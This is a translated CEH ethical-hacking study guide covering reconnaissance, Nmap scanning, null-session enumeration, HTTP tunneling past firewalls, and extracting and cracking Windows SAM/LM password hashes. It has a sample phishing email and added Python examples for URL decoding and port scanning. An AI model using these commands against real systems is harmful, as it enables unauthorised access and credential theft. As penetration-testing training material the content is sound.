CEH Persian: The Ethical Hacker (هکر قانونمند)
Contents (page numbers as printed; chapter titles that the extraction lost are restored from the body of the document where it makes them clear):
Footprinting: p. 18
Scanning and enumeration: p. 36
System hacking: p. 61
Trojans, backdoors, viruses and worms: p. 87
Sniffers: p. 108
Denial of service and session hijacking: p. 122
Hacking web servers and web applications: p. 142
SQL injection and buffer overflows: p. 164
Chapter 10, Wireless networks: p. 178
Chapter 11, Physical security: p. 189
Chapter 12, Linux: p. 200
Chapter 13, IDS and honeypots: p. 211
Chapter 14: p. 223
Chapter 15: p. 229
CEH
. CEH
.
.
CEH
.
.
.
.
Mohsen_Azarnejad@yahoo.com
90
.
.
.
.
.
.
Basic terms:
Threat: a condition or event with the potential to cause harm to a system or its data.
Exploit: a piece of software or a technique that takes advantage of a vulnerability to breach security; a DoS exploit, for instance, crashes or saturates a service. Exploits are classified by where they run:
Remote exploit: works across the network, with no prior access to the target.
Local exploit: requires prior access to the target, typically to raise the privileges of an existing account.
Vulnerability: a weakness in design, implementation or configuration that an exploit can use.
Target of evaluation: the system, product or network that is the subject of the assessment.
Attack: the act of using an exploit against a vulnerability; the attack is the action, the exploit the means.
Typical attack tools and techniques include backdoors, sniffers, rootkits, exploits, buffer overflows and SQL injection.
Attack categories:
Operating system attacks: target default installations, unpatched services and weak operating system settings.
Application-level attacks: target flaws in the applications themselves.
Shrink-wrap code attacks: target the default features and sample code shipped with off-the-shelf software, such as macros in Microsoft Word.
Misconfiguration attacks: target systems whose security settings were never hardened.
The attacker may be an insider (someone with legitimate access) or an outsider.
The phases of an attack:
1. Reconnaissance: gathering information about the target before the attack. Passive reconnaissance collects data without touching the target: social engineering, dumpster diving, and sniffing network traffic to learn IP address ranges and naming conventions. Active reconnaissance probes the target directly ("rattling the door knobs") and can be detected.
2. Scanning: using the reconnaissance results to find live hosts and entry points with dialers, port scanners, network mappers, sweepers and vulnerability scanners; the output is a list of IP addresses, open ports and services.
3. Gaining access: the actual penetration, over the LAN, locally, over the Internet or offline, with techniques such as session hijacking, DoS and stack-based buffer overflows; the result is "owning the system".
4. Maintaining access: keeping control with backdoors and rootkits, and possibly turning the host into a zombie for further attacks.
5. Covering tracks: removing or altering log entries, evading the IDS, and hiding tools and data with steganography.
Hacktivism
Hacktivism is hacking for a political or social cause, usually by defacing the target's websites or running DoS attacks against it.
: .
.
Hacker classes:
White hats: security professionals who use their knowledge defensively, with the owner's permission.
Black hats: the "crackers", or criminal hackers, who break into systems for malicious or personal ends, including DoS attacks.
Grey hats: those who act on both sides, sometimes attacking, sometimes defending.
"Hacker" originally meant a skilled programmer; the malicious sense is properly "cracker" (criminal hacker). An ethical hacker uses the same tools and techniques as a cracker, but only with the owner's authorisation and in order to improve security.
Security rests on three properties:
Confidentiality: information is disclosed only to those authorised to see it.
Integrity: information is not altered by unauthorised parties. A bit-flipping attack, which changes bits of a ciphertext so that the decrypted message changes without the attacker knowing the key, violates integrity.
Availability: systems and data are reachable when needed; DoS attacks target availability.
11
.
.
.
. .
. .
.
.
.
.
.
.
12
Sources of vulnerability and exploit information:
http://nvd.nist.gov
www.securitytracker.com
www.microsoft.com/security
www.securiteam.com
www.packetstormsecurity.com
www.hackerstorm.com
www.hackerwatch.org
www.securityfocus.com
www.securitymagazine.com
www.milw0rm.com
. .
:
.1
.2 Sign a non-disclosure agreement (NDA) with the client before any testing starts.
.3
.4
.5
.6
13
.
:
.
.
Types of penetration test:
Remote network: simulates an attacker on the Internet attacking the perimeter.
Remote dial-up: war dialing against the organisation's modem pool.
Local network: simulates an insider with physical access to the LAN.
Stolen equipment: what an attacker can extract from a lost or stolen laptop.
Social engineering: tests the people and the procedures rather than the systems.
Physical entry: tests physical access controls; an attacker who gets in can plant a rootkit or a key logger directly.
.
The target of evaluation is the system or network under test. Test types by prior knowledge:
Black box: the tester is given no information about the target of evaluation.
White box: the tester has full knowledge of the network and systems.
Grey box: partial knowledge, simulating an insider.
. :
. .
:
.
15
) (
.
.
.
.
) (
.
.
.
16
. .
.
. :
. .
.
.
17
Footprinting is the first step of reconnaissance: building a profile of the target organisation's network, systems and people before any active probing. Footprinting collects domain names, IP address ranges, name servers and mail servers, employee names and e-mail addresses, and the technologies in use.
.
.
.
Footprinting
Footprinting Footprinting .
.
.
.
19
.
Google hacking (including newsgroup searches at http://groups.google.com), http://people.yahoo.com and http://www.intellius.com are sources of personal information. Useful Google operators:
site: restricts results to one domain.
filetype: restricts results to one file type (for example pdf or xls).
link: finds pages that hyperlink to a given URL.
cache: shows Google's cached copy of a page, which may still contain removed content.
intitle: matches words in the page title.
inurl: matches words in the URL.
.
.
:
The information gathered here (IP address ranges, hosts, services) drives everything that follows: roughly 90% of an attack's effort goes into gathering information and 10% into the attack itself.
20
Tools used during footprinting:
Domain name lookup
Whois
Nslookup
Sam Spade
Whois and DNS queries reveal the organisation's registered domains, administrative contacts and IP address blocks.
21
Footprinting :
Whois
Nslookup
ARIN
Neo Trace
VisualRoute Trace
SmartWhois
eMailTracker Pro
Website watcher
Google Earth
GEO Spider
HTTrack Web Copier
E-Mail Spider
DNS Enumeration
DNS enumeration locates all of a target's DNS servers and the records they hold (host names, IP addresses, mail servers), which identifies the hosts that can be attacked. Tools: ARIN, DNSstuff, nslookup, Whois. nslookup queries a DNS server interactively; Sam Spade wraps nslookup in a GUI. Whois output names the domain's name servers (for example AUTH1.NS.NY1.NET), which nslookup then resolves to IP addresses.
22
Whois and DNSstuff: http://www.dnsstuff.com performs DNS lookups from the browser; a DNS lookup of http://www.eccouncil.org there returns its IP address and name servers. ARIN (http://www.arin.net/whois) maps IP addresses to the organisation they are assigned to; a Whois lookup of http://www.yahoo.com there shows the address block and its owner. Regional Internet registries: ARIN (North America), RIPE NCC (Europe), APNIC (Asia-Pacific), LACNIC (Latin America).
Whois
A Whois query for www.eccouncil.org (for example through www.networksolutions.com) returns the registrant record:
Domain ID: D81180127-LROR
Domain Name: ECCOUNCIL.ORG
Created On: 14-Dec-2001 10:13:06 UTC
Last Updated On: 19-Aug-2004 03:49:53 UTC
Expiration Date: 14-Dec-2006 10:13:06 UTC
Sponsoring Registrar: Tucows Inc. (R11-LROR)
Status: OK
Registrant ID: tuTv2ItRZBMNd4lA
Registrant Name: John Smith
Registrant Organization: International Council of E-Commerce Consultants
Registrant Street1: 67 Wall Street, 22nd Floor
Registrant Street2:
Registrant Street3:
Registrant City: New York
Registrant State/Province: NY
Registrant Postal Code: 10005-3198
Registrant Country: US
Registrant Phone: +1.2127098253
Registrant Phone Ext.:
Registrant FAX: +1.2129432300
Registrant FAX Ext.:
Registrant Email: forum@eccouncil.org
Admin ID: tus9DYvpp5mrbLNd
25
Other Whois services:
www.samspade.org
www.geektools.com
www.whois.net
www.demon.net
www.whatismyip.com
The address block and subnet mask returned for the target's IP addresses are assigned by the regional registry (ARIN) under IANA; the footprinter uses them to bound the address range for scanning. VisualRoute, NeoTrace and traceroute then map the network path to those addresses.
27
.
IP IP
.
DNS record types:
A: maps a host name to an IP address.
SOA: start of authority; identifies the primary DNS server for the zone.
CNAME: an alias of another host name.
MX: the mail exchanger for the domain.
PTR: maps an IP address back to a host name.
Traceroute in footprinting: traceroute sends packets with increasing TTL values; each router that decrements the TTL to zero returns an ICMP time-exceeded message, revealing the hop. The result is the path, and often the routers and firewalls, between the attacker and the target. Sam Spade includes a traceroute. The command is tracert hostname on Windows and traceroute hostname on Unix, for example tracert www.yahoo.com.
28
.
tracert .
3D Traceroute
NeoTrace
VisualRoute Trace
Path Analyzer Pro
Maltego
Email Tracking
E-mail tracking tools report when a message was opened, from where, for how long, and whether it was forwarded. readnotify.com is a web service; VisualRoute Mail Tracker and eMailTracker Pro are products.
Web Spider
Spammers use web spiders to crawl websites and harvest e-mail addresses (strings containing @). Footprinters use the same approach to collect addresses and names from the target's site. Countermeasure: robots.txt asks crawlers to skip listed directories and keeps address-bearing pages out of well-behaved spiders; a hostile spider ignores it, and the file itself advertises which directories the owner wants hidden.
Footprinting
.1
.2 Whois
30
.3 DNS
.4
.5
.6
.7 People Search
.8 NeoTrace
.9
.10 readnotify.com
.
.
. .
.
.
. .
.
VPN
.
31
Social engineering is the use of persuasion to get people to reveal information or perform actions; it targets the human element, which cannot be patched. Two forms:
Human-based: person to person, for example calling the help desk and asking for a password reset.
Computer-based: software or e-mail that tricks the user, for example phishing.
Human-based techniques:
Impersonating an employee or valid user: pretending to be staff who have lost access and need help getting back in.
Posing as an important user: claiming to be an executive or VIP so that staff are afraid to refuse the request.
Using a third person: claiming authorisation from someone with authority who is unavailable to confirm it.
32
Computer-based techniques: pop-up windows that ask the user to re-enter credentials, and phishing e-mails that send the user to a fake site asking for account numbers and PINs.
33
.
.
A phishing message may also carry a keylogger or worm as the "update" it urges the user to install. Sample phishing e-mail:
Mail server report.
Our firewall determined the e-mails containing worm copies are being sent from your computer.
Nowadays it happens from many computers, because this is a new virus type (Network Worms).
Using the new bug in the Windows, these viruses infect the computer unnoticeably. After the
penetrating into the computer the virus harvests all the e-mail addresses and sends the copies of
itself to these e-mail addresses
Please install updates for worm elimination and your computer restoring.
Best regards,
Customer support service
Pop-up attacks: a pop-up window that looks like a login prompt captures the credentials the user types into it.
URL obfuscation: disguising the real destination of a link. The link text or the first part of the URL shows a trusted name while the address actually points elsewhere: 204.13.144.2/Citibank looks like Citibank but is only a path on an arbitrary host. Obfuscated URLs are the usual carrier for phishing. Another trick is writing the host as a single decimal number: the four octets of 192.168.10.5 pack into 3232238085 (192 x 256^3 + 168 x 256^2 + 10 x 256 + 5), and http://3232238085/ reaches the same host while hiding the familiar dotted form. Hexadecimal (0xC0.0xA8.0x0A.0x05) and octal forms work the same way.
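As an added example (not from the original text), the conversion described above in both directions, so that a mail filter can compare links by the address they really reach. The Citibank-style URL, the 204.13.144.2 and 192.168.10.5 addresses, and the user@host decoy form are constructed samples, not real phishing data.

```python
"""Decode the obfuscated host forms used in phishing URLs.

Added example (not from the original document). It converts a dotted-decimal
address into the single-number ("dword") form browsers historically accepted,
and canonicalises the reverse direction so a filter can compare URLs by the
address they really point at. All addresses below are constructed samples.
"""
import ipaddress
import re
from urllib.parse import urlsplit


def ip_to_dword(dotted: str) -> int:
    """192.168.10.5 -> 3232238085: big-endian packing of the four octets."""
    return int(ipaddress.IPv4Address(dotted))


def _parse_part(part: str) -> int:
    if re.fullmatch(r"0x[0-9a-f]+", part):
        return int(part, 16)
    if re.fullmatch(r"0[0-7]+", part):
        return int(part, 8)
    if re.fullmatch(r"[0-9]+", part):
        return int(part, 10)
    raise ValueError(part)


def canonical_host(host: str) -> str:
    """Return the dotted-decimal form of a numeric host written as a dword,
    hexadecimal, octal or mixed-radix address; other hosts come back unchanged
    (lower-cased)."""
    host = host.lower()
    try:
        values = [_parse_part(p) for p in host.split(".")]
    except ValueError:
        return host                      # a real DNS name
    if not 1 <= len(values) <= 4:
        return host
    # Classic inet_aton semantics: the last component fills the remaining bytes.
    total = 0
    for v in values[:-1]:
        if v > 0xFF:
            return host
        total = (total << 8) | v
    remaining_bits = 8 * (5 - len(values))
    if values[-1] >= 1 << remaining_bits:
        return host
    total = (total << remaining_bits) | values[-1]
    return str(ipaddress.IPv4Address(total))


def real_target(url: str) -> str:
    """Strip the 'trusted-name@' decoy and resolve the numeric host.
    http://www.citibank.com@3232238085/Citibank really goes to 192.168.10.5."""
    return canonical_host(urlsplit(url).hostname or "")
```

The decoy form relies on the browser treating everything before @ as a user name; modern browsers warn about it, but the numeric host forms still resolve, so a filter should normalise every host through canonical_host before matching it against an allow list.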
.
.
.
.
. .
. .
.
.
.
. .
35
Scanning and Enumeration
Scanning and enumeration follow footprinting. Scanning finds live hosts, open ports, running services and operating systems; enumeration then extracts user names, machine names, shares and services from those hosts. Scanning identifies the target IP addresses; enumeration connects to them.
.
Port scanning: probing a host for open TCP/UDP ports and the services behind them.
Network scanning: finding the active hosts in an IP range.
Vulnerability scanning: checking hosts for known weaknesses.
Port scanning sends packets to each port and interprets the response; an open port 80, for instance, indicates a web server. The well-known port assignments are listed in:
C:\Windows\system32\drivers\etc\services
:
Network scanning produces the list of reachable IP addresses. Vulnerability scanning identifies the operating system and service pack level, then checks for the vulnerabilities known for that version; it is noisy and usually triggers an IDS. All three rely on the TCP/IP behaviour of the target.
38
Ping Sweep
The first step of scanning is finding live hosts. A ping sweep sends an ICMP echo request to every address in a range and records which hosts reply. ICMP is also used for destination-unreachable and other diagnostics, and many firewalls block it, so a silent host is not necessarily down. Tools: Friendly Pinger, Pinger, Angry IP Scanner, WS_Ping_Pro.
Ping sweeps are easy for an IDS or IPS to spot, since one source pings many addresses in succession. Blocking ICMP echo at the firewall defeats them, at the cost of diagnostics; limiting the rate of ICMP and alerting on sweeps is the usual compromise.
Evading the IDS while scanning: slow the scan so probes are spread across time, randomise the order of targets and ports, and fragment packets. A stateful NIDS that reassembles TCP streams is harder to evade. Nmap is the standard scanner: it performs ping sweeps and port scans of every type, detects services and operating systems, and can be slowed or fragmented to evade detection. It runs on Unix and Windows with a command-line and a GUI front end.
Nmap scan types:
TCP connect: completes the full three-way handshake on each port; reliable, but logged by the target.
SYN (half-open): sends SYN and notes the SYN-ACK or RST reply without completing the handshake.
XMAS tree: sends a packet with the FIN, URG and PSH flags set; a closed port replies with RST, an open port is silent.
FIN: only the FIN flag set; interpreted the same way.
Null: no flags set; interpreted the same way.
ACK: sends ACK to map firewall rules (filtered versus unfiltered) rather than open ports.
Window: like the ACK scan but uses the TCP window size in the RST to guess whether the port is open.
Nmap's main options:
Nmap option     Meaning
-sT             TCP connect scan
-sS             SYN scan
-sF             FIN scan
-sX             XMAS tree scan
-sN             Null scan
-sP             Ping scan
-sU             UDP scan
-sO             Protocol scan
-sA             ACK scan
-sW             Window scan
-sR             RPC scan
-sL             List/DNS scan
-sI             Idle scan
-P0             Don't ping
-PT             TCP ping
-PS             SYN ping
-PI             ICMP ping
-PB             TCP and ICMP ping
-PP             ICMP timestamp
-PM             ICMP netmask
-oN             Normal output
-oX             XML output
-oG             Greppable output
-oA             All output
-T Paranoid     Serial scan; 300 sec between probes
-T Sneaky       Serial scan; 15 sec between probes
-T Polite       Serial scan; 0.4 sec between probes
-T Normal       Parallel scan (default)
-T Aggressive   Parallel scan; 300 sec per-host timeout, 1.25 sec per probe
-T Insane       Parallel scan; 75 sec per-host timeout, 0.3 sec per probe
hping examples:
hping2 10.0.0.5 -p 80
sends TCP probes to port 80 of 10.0.0.5.
hping www.debian.org -p 80 -A
sends packets with the ACK flag set to port 80 of www.debian.org.
hping www.yahoo.com -p 80 -A
the IP ID field of the replies shows whether the host increments its IP ID predictably, which is what an idle (zombie) scan relies on.
TCP flags and the three-way handshake
A TCP connection starts with the three-way handshake: the client sends SYN, the server replies SYN-ACK, and the client answers ACK. Only then is data exchanged.
TCP is connection-oriented, and the flags in the TCP header control the state of the connection. The six flags are SYN, ACK, PSH, URG, FIN and RST:
SYN (Synchronize): starts a connection and synchronises sequence numbers.
ACK (Acknowledge): acknowledges received data or the peer's SYN.
PSH (Push): asks the receiver to pass the data to the application immediately.
URG (Urgent): marks data to be processed before the rest.
FIN (Finish): signals that there is no more data; closes the connection gracefully.
RST (Reset): aborts the connection.
Scanners set unusual combinations of these flags and infer the port state from the reply. The flags each scan type sends:
Flags sent by hacker                              Type of scan
All flags set (ACK, RST, SYN, URG, PSH, FIN)      XMAS scan
FIN                                               FIN scan
No flags set                                      NULL scan
SYN, then ACK                                     TCP connect/full-open scan
SYN, then RST                                     SYN scan/half-open scan
(Nmap's own -sX sends FIN, PSH and URG only, as described above.)
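An added example (not from the original text) that turns the two tables above into code: it encodes the TCP flag bits, names the scan type a probe belongs to, applies the RFC 793 reply rules that make FIN/NULL/XMAS scans work, and adds the IP ID arithmetic behind the idle scan mentioned with hping. The flag values are the real header bits; the IP ID observations are constructed.

```python
"""Classify TCP port-scan probes by their flag bits and predict the reply a
standards-compliant stack gives for an open versus a closed port.

Added example (not part of the original document). The RFC 793 rule that
makes FIN/NULL/XMAS scans work: a closed port answers any non-RST segment
with RST, an open port answers a lone SYN with SYN-ACK and silently drops
the rest. The idle-scan helper uses constructed IP ID observations.
"""
FLAGS = {"FIN": 0x01, "SYN": 0x02, "RST": 0x04, "PSH": 0x08, "ACK": 0x10, "URG": 0x20}


def encode(*names: str) -> int:
    bits = 0
    for n in names:
        bits |= FLAGS[n]
    return bits


def decode(bits: int) -> set:
    return {n for n, b in FLAGS.items() if bits & b}


def scan_type(bits: int) -> str:
    """Name the scan a single probe belongs to, by the flags nmap sends."""
    f = decode(bits)
    if f == {"SYN"}:
        return "SYN (half-open) or connect scan"
    if f == {"FIN"}:
        return "FIN scan"
    if f == {"FIN", "PSH", "URG"}:
        return "XMAS tree scan"
    if not f:
        return "NULL scan"
    if f == {"ACK"}:
        return "ACK scan (firewall rule mapping)"
    return "unclassified"


def scan_from_sequence(sent: list) -> str:
    """Classify by the sequence of probes on one port, as in the table."""
    words = [decode(b) for b in sent]
    if words == [{"SYN"}, {"ACK"}]:
        return "TCP connect/full-open scan"
    if words == [{"SYN"}, {"RST"}]:
        return "SYN scan/half-open scan"
    if len(words) == 1:
        return scan_type(sent[0])
    return "unclassified"


def expected_reply(port_open: bool, bits: int) -> str:
    """What an RFC 793 stack sends back to a probe with these flags."""
    f = decode(bits)
    if "RST" in f:
        return "nothing"        # resets are never answered
    if "ACK" in f:
        return "RST"            # no matching connection, open or not
    if not port_open:
        return "RST"            # closed port: every non-RST segment is reset
    if "SYN" in f:
        return "SYN-ACK"        # open port completes step 2 of the handshake
    return "nothing"            # open port silently drops FIN/NULL/XMAS


def infer_state(bits: int, reply: str) -> str:
    """Invert expected_reply: what the scanner concludes from a reply.
    Silence on FIN/NULL/XMAS is 'open|filtered' because a firewall dropping
    the probe looks identical to an open port."""
    f = decode(bits)
    if "SYN" in f and "ACK" not in f:
        return {"SYN-ACK": "open", "RST": "closed"}.get(reply, "filtered")
    if "ACK" in f:
        return "unfiltered" if reply == "RST" else "filtered"
    return "closed" if reply == "RST" else "open|filtered"


def idle_scan_verdict(ipid_before: int, ipid_after: int) -> str:
    """Idle scan: the zombie's IP ID increments once per packet it sends.
    Probe the zombie, send a SYN to the target spoofed as the zombie, probe
    again. Open port: target SYN-ACKs the zombie, zombie RSTs it -> delta 2.
    Closed port: target RSTs the zombie, zombie ignores it -> delta 1."""
    delta = (ipid_after - ipid_before) % 65536
    return {1: "closed|filtered", 2: "open"}.get(delta, "zombie busy (delta %d)" % delta)
```

Note that infer_state is the scanner's view and expected_reply the target's; the gap between them (open|filtered) is exactly what makes stealth scans unreliable against filtered hosts and against stacks that do not follow RFC 793.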
FloppyScan: a bootable floppy with a mini Linux and Nmap that scans the network it is booted on and e-mails the results.
IPEye: a command-line TCP port scanner supporting Null, FIN, SYN and XMAS scans. It reports each port as closed (an RST came back), rejected or dropped (no answer, typically a firewall), or open.
IPSecScan: scans an IP range for hosts with IPSec enabled.
Hping2: a packet crafter that sends arbitrary ICMP, UDP and TCP packets and has a traceroute mode.
47
War-Dialing
War dialing means dialing a range of telephone numbers to find modems that answer. Remote-access modems attached to servers or workstations often sit outside the firewall's protection and may authenticate with weak protocols such as PAP, giving an attacker a way into the network that bypasses the VPN. War-dialing tools record the numbers that answer with a carrier (dial-in lines). Tools: THC-Scan, ModemScan, ToneLoc, PhoneSweep, TeleSweep. Countermeasures: inventory the organisation's phone lines, remove unauthorised modems, and require strong authentication on the dial-in lines that remain.
48
Banner Grabbing
Banner grabbing and OS fingerprinting determine the operating system and service versions from the responses a host gives. Many services announce themselves: FTP and telnet banners, the SMTP greeting of Microsoft Exchange. Active fingerprinting sends crafted TCP packets and compares the stack's responses with a database; it can be detected by an IDS. Passive fingerprinting only sniffs traffic the host sends anyway. Banner grabbing with telnet:
telnet www.certifiedhacker 80
then type HEAD / HTTP/1.0 and press Enter twice; the Server header in the reply identifies the web server.
p0f performs passive fingerprinting: p0f -i <interface>. Httprint and Miart analyse HTTP headers; XPROBE2 fingerprints from ICMP (ping) responses; Netcraft reports the server platform from its records.
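As an added example (not from the original text), the telnet procedure above done programmatically: a TCP connect scan followed by an HTTP banner grab. So that it runs offline, the block starts its own throw-away listener on 127.0.0.1 that answers like a web server; the Server string it returns is a constructed sample, not a real host's banner.

```python
"""TCP connect scan plus HTTP banner grabbing against a local test service.

Added example (not from the original document). The listener exists only so
the example runs offline; its banner is a constructed sample.
"""
import socket
import threading

SAMPLE_BANNER = b"HTTP/1.0 200 OK\r\nServer: Apache/1.3.27 (Unix)\r\nContent-Length: 0\r\n\r\n"


def start_fake_http(banner: bytes = SAMPLE_BANNER) -> tuple:
    """Listen on an ephemeral port; answer each request with the banner."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)

    def serve():
        while True:
            try:
                conn, _ = srv.accept()
            except OSError:
                return                  # listener closed
            with conn:
                try:
                    if conn.recv(1024):  # a bare connect scan sends nothing
                        conn.sendall(banner)
                except OSError:
                    pass

    threading.Thread(target=serve, daemon=True).start()
    return srv, srv.getsockname()[1]


def free_port() -> int:
    """A port that is (almost certainly) closed right now."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.bind(("127.0.0.1", 0))
        return s.getsockname()[1]


def connect_scan(host: str, ports, timeout: float = 0.5) -> dict:
    """Full three-way handshake per port (nmap -sT). The connection is
    visible in the target's logs, unlike a SYN scan."""
    state = {}
    for p in ports:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(timeout)
            state[p] = "open" if s.connect_ex((host, p)) == 0 else "closed"
    return state


def grab_http_banner(host: str, port: int, timeout: float = 2.0) -> str:
    """Send the minimal request from the text and return the Server header."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(b"HEAD / HTTP/1.0\r\nHost: %s\r\n\r\n" % host.encode())
        data = b""
        while True:
            chunk = s.recv(4096)
            if not chunk:
                break
            data += chunk
    for line in data.decode(errors="replace").split("\r\n"):
        if line.lower().startswith("server:"):
            return line.split(":", 1)[1].strip()
    return ""
```

A real target may omit or forge the Server header (ServerMask, mentioned later in this document, does exactly that), so the banner is a hint to be confirmed with fingerprinting, not a fact.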
Vulnerability scanners:
Bidiblah
SAINT
ISS Security Scanner
Nessus (for software)
GFI LANguard
SATAN
Retina
Nagios
Nikto (for web servers)
SAFEsuite Internet Scanner
IdentTCPScan
Network mapping tools:
FriendlyPinger
LANsurveyor
IPsonar
LANState
Proxy servers: an attacker routes the scan through a proxy server, or a chain of proxies, so that the target's logs show the proxy's address rather than the attacker's. Proxies also bypass content filters and hide the attacker's origin.
50
:
SocksChain
Proxy Workbench
ProxyManager
Super Proxy Helper
MultiProxy
TOR Proxy Chaining Software
Proxy Finder
ProxyBag
AutomatedProxy Leecher
Anonymizers
An anonymizer is a web proxy that strips identifying information from requests so that the destination site sees only the anonymizer's address; it also bypasses local filtering.
:
StealthSurfer
Browzar
Torpak Browser
GetAnonymous
IP Privacy
Anonymity 4 Proxy
Psiphon
AnalogX Proxy
NetProxy
Proxy+
ProxySwitcher Lite
JAP
Proxomitron
HTTP Tunneling
Firewalls and IDS normally allow outbound HTTP (and SMTP); tunneling wraps another protocol (telnet, SSH, instant messaging) inside HTTP requests so it passes through as web traffic. Httptunnel consists of hts on the server and htc on the client. On the server, listen on port 80 and forward to telnet (port 23):
hts -F server.test.com:23 80
On the client, connect through the corporate proxy and expose the tunnel on local port 22:
htc -P proxy.corp.com:80 -F 22 server.test.com:80
Then telnet localhost 22 reaches port 23 on server.test.com through port 80.
IP Spoofing
IP spoofing forges the source address of packets so that the target attributes them to another host. Because the replies go to the spoofed address, it is used for one-way attacks such as DoS, or combined with source routing, which asks routers to return the replies via the attacker's host. An IDS can flag source-routed packets and packets with impossible source addresses.
Enumeration
Enumeration actively connects to the target to extract user names, machine names, shares, services and other details. It is noisier than scanning and is usually logged. The output is a list of accounts and resources to attack, tied to IP and MAC addresses.
Null Session
A NetBIOS null session is a connection to the IPC$ share of a Windows host with no user name and no password. It rides on SMB/CIFS and lets the attacker list users, groups, shares and policies. To open one:
Windows:
net use \\target\ipc$ "" /u:""
Linux (Samba):
smbclient \\\\target\\ipc\$ -U ""
Enumeration tools that use it: GetAcct, user2sid, sid2user, enum, SuperScan, Nbtstat, NetView, DumpSec.
Null session countermeasures
Null sessions need TCP 135, 137 and 139 (NetBIOS) or 445 (direct SMB); block these at the perimeter. Disable NetBIOS over TCP/IP on the interface:
1. Open the properties of the network connection.
2. Open TCP/IP Properties.
3. Click Advanced.
4. On the WINS tab, select Disable NetBIOS over TCP/IP.
Restrict anonymous access in the registry:
1. In Regedt32 open HKLM\SYSTEM\CurrentControlSet\Control\Lsa.
2. Choose Edit, Add Value:
   Value name: RestrictAnonymous
   Data type: REG_DWORD
   Value: 2
PsTools (Sysinternals) is a command-line suite that is useful for enumeration and remote administration:
PsExec: runs a process on a remote system.
PsFile: lists files opened remotely.
PsGetSid: shows the SID of a computer or user.
PsKill: kills a process by name or ID.
PsInfo: shows system information.
PsList: lists processes.
PsLoggedOn: shows who is logged on locally and through resource (share) sessions.
PsLogList: dumps event log records.
PsPasswd: changes account passwords.
PsService: views and controls services.
PsShutdown: shuts down or reboots a computer.
PsSuspend: suspends a process.
PsUptime: shows how long the system has been running.
SNMP Enumeration
SNMP manages network devices. An SNMP agent on the device keeps its configuration and statistics in the MIB; an SNMP management station reads and writes them, and the agent sends traps (alerts) to the station. Access is controlled only by community strings: the read community string, whose default is "public", and the read/write community string, whose default is "private". SNMP enumeration queries agents with the default strings to pull user accounts, routes, ARP tables, interfaces and device details.
SNMP countermeasures: remove the SNMP agent or disable the service where it is not needed; change the default community strings; use Group Policy to set "Additional restrictions for anonymous connections"; block SNMP at the perimeter.
Windows enumeration steps:
1. Collect the host list from scanning.
2. Open a null session.
3. Enumerate users, groups and shares with a Windows enumeration tool such as SuperScan.
60
.
.
.
.
.
.
.
Brute-force attacks against logins succeed when passwords are weak. The usual targets:
.1 Default accounts such as Administrator and Guest, which often keep blank or well-known passwords.
.2 .
.3 .
.4 .
.5 .
62
.
.
.
Passwords are stored as hashes; a cracker computes the hash of each candidate password and compares it with the stored one. On Windows the hashes live in the SAM file, on Unix in /etc/shadow.
Legion: scans IP ranges for NetBIOS shares and brute-forces share passwords.
NTInfoScan: scans NT 4.0 hosts and writes an HTML report of shares, users and services.
Smbbf: an SMB password brute-forcer, about 53,000 guesses per minute.
L0phtCrack: dictionary, brute-force and hybrid cracking of Windows hashes.
John the Ripper: cracks Unix and NT hashes. LM hashes are case-insensitive, so the recovered password may differ in case from the real one.
LanManager Hash
Windows NT and 2000 store two hashes of each password: the LM hash and the NT (NTLM) hash. The LM hash of the password 123456abcdef is computed as follows:
1. Convert to upper case: 123456ABCDEF.
2. Pad with nulls to 14 characters: 123456ABCDEF__ (each _ is a null byte).
3. Split into two 7-character halves: 123456A and BCDEF__.
4. Use each half as a DES key to encrypt a fixed constant; the two results are concatenated:
123456A = 6BF11E04AFAB197F
BCDEF__ = F1E9FFDCC75575B15 (as printed in the source; a DES block is 16 hex digits)
The LM hash is 6BF11E04AFAB197F F1E9FFDCC75575B15.
Each half is attacked independently, so the effective strength is that of two 7-character upper-case passwords, and a password of 7 characters or fewer has a second half equal to the hash of all nulls.
                    LM                 NTLM v1            NTLM v2
Hash key length     56 bit + 56 bit    -                  -
Hash algorithm      DES (ECB)          MD4                MD4
Hash length         64 bit + 64 bit    128 bit            128 bit
C/R key length      56+56+16 bit       56+56+16 bit       128 bit
C/R algorithm       DES (ECB)          DES (ECB)          HMAC_MD5
C/R value length    64+64+64 bit       64+64+64 bit       128 bit
Windows 2000 keeps the password hashes in the SAM file under Windows\system32\config. The file is locked while Windows runs, so attackers boot DOS or a Linux CD to copy it, or take the copy left in the repair directory: RDISK (rdisk /s) writes a compressed sam._ to c:\windows\repair, which is expanded at a command prompt with:
C:\>expand sam._ sam
L0phtCrack then cracks the hashes with dictionary, brute-force and hybrid attacks.
Win32CreatedLocalAdminUser (the "x" payload) creates a local administrator account on the target; it is part of the Metasploit framework.
Offline NT Password Resetter: a Linux boot CD that mounts the NTFS volume and resets the administrator password.
LCP: cracks NT, 2000, XP and 2003 passwords by hybrid, dictionary and brute-force attacks.
Other tools: Asterisk Logger, Access PassView, Crack, Ophcrack2, SID&User, Asterisk Key.
65
SMB Logon
The NTLM challenge/response used for SMB logons can be sniffed and cracked, or relayed to another server. Tools:
SMBRelay: an SMB server that captures the hashes of clients connecting to it and relays the authentication to the real server, a man-in-the-middle attack.
SMBRelay2: the same at the NetBIOS name level instead of the IP level.
Pwdump2: dumps the hashes from the SAM for L0phtCrack.
Samdump: dumps NTLM hashes from the SAM.
C2MYAZZ: spoofs the server response so that the client falls back to sending its password in clear text.
66
Passwords of 8 to 12 characters are the usual recommendation. SYSKEY encrypts the SAM with an additional key. Log failed logons and lock accounts after repeated failures to stop brute force. A password of 15 characters or more produces no LM hash at all. LM hashes, unlike NT hashes, are cracked quickly by brute force, so their presence in the SAM is the main weakness; NTLM v2 and Kerberos use only the NT hash, and the LM hash exists for compatibility with Windows 95/98 clients. To stop storing LM hashes:
Method 1: in Group Policy, Security Options (Local Security Policy), enable:
Network security: Do not store LAN Manager hash value on next password change
Method 2: in the registry, create the key NoLMHash under:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa
Method 3: use passwords of at least 15 characters.
:
.1 .
.2 .
.3 whois
.
.4 .
.5 21 .
68
Passwords should expire: require a change every 30 days and prevent reuse of recent passwords, so that a cracked password has a limited life.
69
.
EC-Council recommends passwords that:
o contain special characters ($,:"%@!#)
o mix upper and lower case letters
o mix letters and digits
o are not dictionary words or personal information
